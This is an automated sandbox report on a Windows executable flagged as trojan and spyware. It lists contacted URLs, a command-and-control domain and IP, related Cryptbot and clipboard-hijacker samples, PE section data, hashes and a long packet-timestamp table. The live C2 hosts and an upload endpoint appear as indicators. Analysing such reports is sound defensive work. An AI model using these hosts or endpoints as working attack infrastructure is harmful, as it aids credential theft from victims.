https://httpbin.org/ipbefore | Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | Tsy9P2T9yF.exe, Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/hsts.html# | Tsy9P2T9yF.exe | false | | high
https://curl.se/docs/http-cookies.html# | Tsy9P2T9yF.exe | false | | high
https://curl.se/docs/alt-svc.html | Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322 | Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963 | Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://.css | Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | Tsy9P2T9yF.exe, 00000000.00000003.1390041936.00000000072FF000.00000004.00001000.00020000.00000000.sdmp, Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | Tsy9P2T9yF.exe, 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322M | Tsy9P2T9yF.exe, 00000000.00000002.1491407995.00000000010EE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
147.45.113.159 | home.twentytk20pn.top | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578993
Start date and time: 2024-12-20 17:29:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Tsy9P2T9yF.exe (renamed because original name is a hash value)
Original Sample Name: 03ae071235d37edc3ea30848462bccbc.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 76
• Number of non-executed functions: 53
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 20.109.210.53
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Tsy9P2T9yF.exe
Time | Type | Description
11:30:34 | API Interceptor | 3x Sleep call for process: Tsy9P2T9yF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.226.108.155 | kGxQbLOG7s.exe | malicious | Clipboard Hijacker, Cryptbot |
 | HHFgVU1HGu.exe | malicious | Clipboard Hijacker, Cryptbot |
 | GxSEtDSBuK.exe | malicious | Clipboard Hijacker, Cryptbot |
 | ob4eL9Z1O4.exe | malicious | Cryptbot |
 | nojxbVm8i4.exe | malicious | Cryptbot |
 | WP6s7cCLzr.exe | malicious | Unknown |
 | oJkvQZYkrx.exe | malicious | Unknown |
 | 2M43DSi2cx.exe | malicious | Unknown |
 | f9bcOz8SxR.exe | malicious | Unknown |
 | 1o81tDUu5M.exe | malicious | Unknown |
147.45.113.159 | kGxQbLOG7s.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | q79Pocl81P.exe | malicious | Cryptbot | twentytk20pn.top/v1/upload.php
 | fnuFOEqg4j.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | ob4eL9Z1O4.exe | malicious | Cryptbot | twentytk20pn.top/v1/upload.php
 | S0O8qbVwLk.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | EMasovlyrQ.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | oJkvQZYkrx.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | f9bcOz8SxR.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
 | 1o81tDUu5M.exe | malicious | Unknown | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | kGxQbLOG7s.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | j6Nv9kUydV.exe | malicious | Unknown | 98.85.100.80
 | q79Pocl81P.exe | malicious | Cryptbot | 98.85.100.80
 | 28PCC9oa8s.exe | malicious | Unknown | 98.85.100.80
 | HHFgVU1HGu.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | GxSEtDSBuK.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
 | fnuFOEqg4j.exe | malicious | Unknown | 98.85.100.80
 | ob4eL9Z1O4.exe | malicious | Cryptbot | 34.226.108.155
 | iuO4kwUi17.exe | malicious | Unknown | 98.85.100.80
 | S0O8qbVwLk.exe | malicious | Unknown | 98.85.100.80
home.twentytk20pn.top | kGxQbLOG7s.exe | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
 | q79Pocl81P.exe | malicious | Cryptbot | 147.45.113.159
 | fnuFOEqg4j.exe | malicious | Unknown | 147.45.113.159
 | ob4eL9Z1O4.exe | malicious | Cryptbot | 147.45.113.159
 | S0O8qbVwLk.exe | malicious | Unknown | 147.45.113.159
 | EMasovlyrQ.exe | malicious | Unknown | 147.45.113.159
 | oJkvQZYkrx.exe | malicious | Unknown | 147.45.113.159
 | f9bcOz8SxR.exe | malicious | Unknown | 147.45.113.159
 | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
 | 1o81tDUu5M.exe | malicious | Unknown | 147.45.113.159
s-part-0035.t-0009.t-msedge.net | http://www.eventcreate.com/e/you-have-received-a-new-doc | malicious | HTMLPhisher | 13.107.246.63
 | gTU8ed4669.exe | malicious | Credential Flusher | 13.107.246.63
 | zSmMqGGeVy.exe | malicious | Unknown | 13.107.246.63
 | 2M43DSi2cx.exe | malicious | Unknown | 13.107.246.63
 | VajVW1leCd.exe | malicious | Unknown | 13.107.246.63
 | 7JKssbjRDa.exe | malicious | Unknown | 13.107.246.63
 | m21jm5y5Z5.exe | malicious | LummaC | 13.107.246.63
 | 16ebsersuX.exe | malicious | Cryptbot | 13.107.246.63
 | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 13.107.246.63
 | f48jWpQ2F8.exe | malicious | LummaC | 13.107.246.63
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
FREE-NET-ASFREEnetEU | kGxQbLOG7s.exe | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
FREE-NET-ASFREEnetEU | q79Pocl81P.exe | malicious | Cryptbot | 147.45.113.159
FREE-NET-ASFREEnetEU | fnuFOEqg4j.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | ob4eL9Z1O4.exe | malicious | Cryptbot | 147.45.113.159
FREE-NET-ASFREEnetEU | S0O8qbVwLk.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | EMasovlyrQ.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | oJkvQZYkrx.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | f9bcOz8SxR.exe | malicious | Unknown | 147.45.113.159
FREE-NET-ASFREEnetEU | u16wYpJpGE.exe | malicious | Clipboard Hijacker, Cryptbot | 147.45.113.159
FREE-NET-ASFREEnetEU | 1o81tDUu5M.exe | malicious | Unknown | 147.45.113.159
AMAZON-AESUS | nshkppc.elf | malicious | Mirai | 54.136.161.117
AMAZON-AESUS | kGxQbLOG7s.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | ppc.elf | malicious | Mirai | 3.221.94.196
AMAZON-AESUS | HHFgVU1HGu.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | GxSEtDSBuK.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | ob4eL9Z1O4.exe | malicious | Cryptbot | 34.226.108.155
AMAZON-AESUS | nojxbVm8i4.exe | malicious | Cryptbot | 34.226.108.155
AMAZON-AESUS | WP6s7cCLzr.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | nsharm7.elf | malicious | Mirai | 184.73.107.148
AMAZON-AESUS | oJkvQZYkrx.exe | malicious | Unknown | 34.226.108.155
                                                            No context
                                                            No context
                                                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.985923339339859
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Tsy9P2T9yF.exe
File size: 4'448'768 bytes
MD5: 03ae071235d37edc3ea30848462bccbc
SHA1: d8425df6c157fc8699596f64a0bf996692ebc947
SHA256: 72662d9e82835cb7e3210889828befd75dd7921c8bb6c45f5757c23602432536
SHA512: 2ef13be57bdebf61bf59e7b39a5c522f91ddb9d003a1a9a66b3fa9c7ef35ead57626858050ef2615ed87da4a32759328121e63fb46b2b4ce2f949caeea8871dc
SSDEEP: 98304:96/aLUGOI+ds3fWZOf+6hrjqgYyHX83X/x6MmfIOe2AHk5JLr4D5:UyLUBI+do26hflYyHX+J6Zn0uJLr25
TLSH: B42633A712F301E9FCFAA6350B87D945F329AF66543DF41482A2E417C8C9A4971E03DE
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...`.......PD...@...................................D...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xf56000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                            Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb544a8 | 0x10 | zxrdxyue
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb54458 | 0x18 | zxrdxyue
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x617000 | 0x283e00 | 217c879dadd83a810fd6167c7f77b7f4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x618000 | 0x2b0 | 0x200 | 98ff648a5d1828e549fdab78380a9ae1 | False | 0.798828125 | data | 5.990140429724783 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x61a000 | 0x384000 | 0x200 | bd178d238a0d920d59a5f131d77727bf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zxrdxyue | 0x99e000 | 0x1b7000 | 0x1b6800 | 003ae60fe326f3f398c6f35654981727 | False | 0.9944245741875712 | data | 7.955163779925324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xhtdnoyt | 0xb55000 | 0x1000 | 0x400 | 03680617cb336b51ca6e0c7556abf117 | False | 0.755859375 | data | 6.086101486829323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xb56000 | 0x3000 | 0x2200 | 6c5ef927ddf1f3cad124dbe324eb1dbd | False | 0.05939797794117647 | DOS executable (COM) | 0.7196300324976413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xb544b8 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 20, 2024 17:30:35.763643980 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.763653994 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.763694048 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.763715029 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.763887882 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764030933 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764693022 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764741898 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764751911 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764806032 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.764914036 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765167952 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765577078 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765640974 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765669107 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765717983 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765770912 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765779972 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.765840054 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.765883923 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766010046 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766061068 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766079903 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766124010 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766154051 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766207933 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766236067 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766244888 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766262054 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766298056 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766324043 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766334057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766345024 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766388893 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766403913 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766426086 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766474009 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.766544104 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766552925 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766575098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766787052 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766840935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.766964912 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767060041 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767070055 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767092943 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767165899 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767174959 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767311096 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767327070 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767467022 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767857075 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767867088 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767875910 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767885923 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767896891 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767909050 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767918110 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767941952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767951965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.767961025 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768179893 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768189907 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768198967 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768208027 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768218994 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768347025 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.768356085 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.832124949 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.832268953 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884352922 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884627104 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884704113 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884713888 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884763956 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884866953 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.884877920 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.885623932 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.885695934 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.885838985 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.885883093 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.885998964 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886008024 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886029959 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886164904 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886177063 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886197090 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886226892 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886238098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886738062 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886778116 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.886965990 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887007952 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887028933 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887038946 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887162924 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887172937 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887206078 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887217045 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887296915 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887340069 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887386084 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887463093 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887471914 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887480974 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887509108 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887520075 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887643099 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887682915 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887761116 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887888908 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887901068 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.887928009 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888063908 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888227940 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888237000 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888262033 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888360023 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888370037 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888381004 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888415098 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888425112 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888569117 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888741016 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888874054 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888883114 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888891935 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888902903 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888962030 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888972044 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888983965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.888993025 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.889002085 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.889246941 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.889302015 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.905395031 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.905580997 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:35.905625105 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:35.905889034 CET4972380192.168.2.11147.45.113.159
                                                            Dec 20, 2024 17:30:36.005291939 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005434036 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005471945 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005494118 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005534887 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005548954 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005647898 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005660057 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005683899 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005789042 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.005857944 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006069899 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006083965 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006122112 CET8049723147.45.113.159192.168.2.11
                                                            Dec 20, 2024 17:30:36.006134033 CET8049723147.45.113.159192.168.2.11
